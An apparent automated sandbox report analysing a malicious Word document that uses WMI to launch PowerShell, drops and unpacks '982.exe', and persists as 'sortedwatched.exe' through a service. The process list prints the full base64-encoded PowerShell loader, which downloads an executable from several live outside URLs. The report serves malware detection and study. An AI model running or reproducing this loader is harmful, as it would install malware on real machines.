Source: Nuovo_documento_2019.09.20.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: Nuovo_documento_2019.09.20.docOLE document summary: title field not present or empty
Source: Nuovo_documento_2019.09.20.docOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3!j.............3!j....L.,.L| jD......n$(&j...n....L| j.............7!j0..... jL.,.0j%.............$(&j.. j....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h.......Ul....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...................A.{u,...............a.{u..0.....X...h...$...bl....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h...$....l....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,...................A.{u,...............a.{u..0.....X...h........l....................................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#...0j%.0...A.{u................a.{u..0.....X...h...d....l..................#.................zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#.......0...A.{u................a.{u..0.....X...h...d....l..................#.......l.........zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......'...........A.{uL...............a.{u..0.....X...h...d....l..................'.......,.........zu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......+...........A.{uL...............a.{u..0.....X...h...d....m..................+.......,.........zu........Jump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\982.exeCommand line argument: PB4_2_0042E6A0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Sample is known by AntivirusShow sources
Source: Nuovo_documento_2019.09.20.docVirustotal: Detection: 22%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\982.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-2847
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvA
Source: unknownProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknownProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknownProcess created: C:\Users\user\982.exe --4e722ada
Source: unknownProcess created: C:\Users\user\982.exe --4e722ada
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: unknownProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe' Jump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe 'C:\Users\user\982.exe' Jump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe --4e722adaJump to behavior
Source: C:\Users\user\982.exeProcess created: C:\Users\user\982.exe --4e722adaJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exeJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385Jump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess created: C:\Windows\System32\sortedwatched.exe --2a75e385Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\982.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: ntdll.pdb source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb3 source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\982.exeUnpacked PE file: 5.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\982.exeUnpacked PE file: 7.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\982.exeUnpacked PE file: 5.2.982.exe.400000.0.unpack
Source: C:\Users\user\982.exeUnpacked PE file: 7.2.982.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exeUnpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,4_2_00432522
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_0042937D push ecx; ret 4_2_00429390
Source: C:\Users\user\982.exeCode function: 4_2_00429303 push ecx; ret 4_2_00429316
Source: C:\Users\user\982.exeCode function: 4_2_002D2B12 push eax; ret 4_2_002D2B1C
Source: C:\Users\user\982.exeCode function: 4_2_002D2CD3 push eax; ret 4_2_002D2CD4
Source: C:\Users\user\982.exeCode function: 5_2_004123D3 push eax; ret 5_2_004123DD
Source: C:\Users\user\982.exeCode function: 5_2_00412594 push eax; ret 5_2_00412595
Source: C:\Users\user\982.exeCode function: 6_2_003F2CD3 push eax; ret 6_2_003F2CD4
Source: C:\Users\user\982.exeCode function: 6_2_003F2B12 push eax; ret 6_2_003F2B1C
Source: C:\Users\user\982.exeCode function: 7_2_004123D3 push eax; ret 7_2_004123DD
Source: C:\Users\user\982.exeCode function: 7_2_00412594 push eax; ret 7_2_00412595
Source: C:\Users\user\982.exeCode function: 7_1_004123D3 push eax; ret 7_1_004123DD
Source: C:\Users\user\982.exeCode function: 7_1_00412594 push eax; ret 7_1_00412595
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003F2CD3 push eax; ret 9_2_003F2CD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003F2B12 push eax; ret 9_2_003F2B1C
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_00502CD3 push eax; ret 11_2_00502CD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_00502B12 push eax; ret 11_2_00502B1C
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_004123D3 push eax; ret 12_2_004123DD
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00412594 push eax; ret 12_2_00412595
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_004123D3 push eax; ret 12_1_004123DD
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00412594 push eax; ret 12_1_00412595

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\sortedwatched.exeExecutable created and started: C:\Windows\System32\sortedwatched.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\982.exePE file moved: C:\Windows\System32\sortedwatched.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0

Hooking and other Techniques for Hiding and Protection:

barindex
Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)Show sources
Source: Nuovo_documento_2019.09.20.docOLE, VBA macro line: If RecentFiles.Count > 3 Then
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\982.exeFile opened: C:\Windows\system32\sortedwatched.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\982.exeCode function: 4_2_00417380 IsWindowVisible,IsIconic,4_2_00417380
Source: C:\Users\user\982.exeCode function: 4_2_0040B948 IsIconic,GetWindowPlacement,GetWindowRect,4_2_0040B948
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
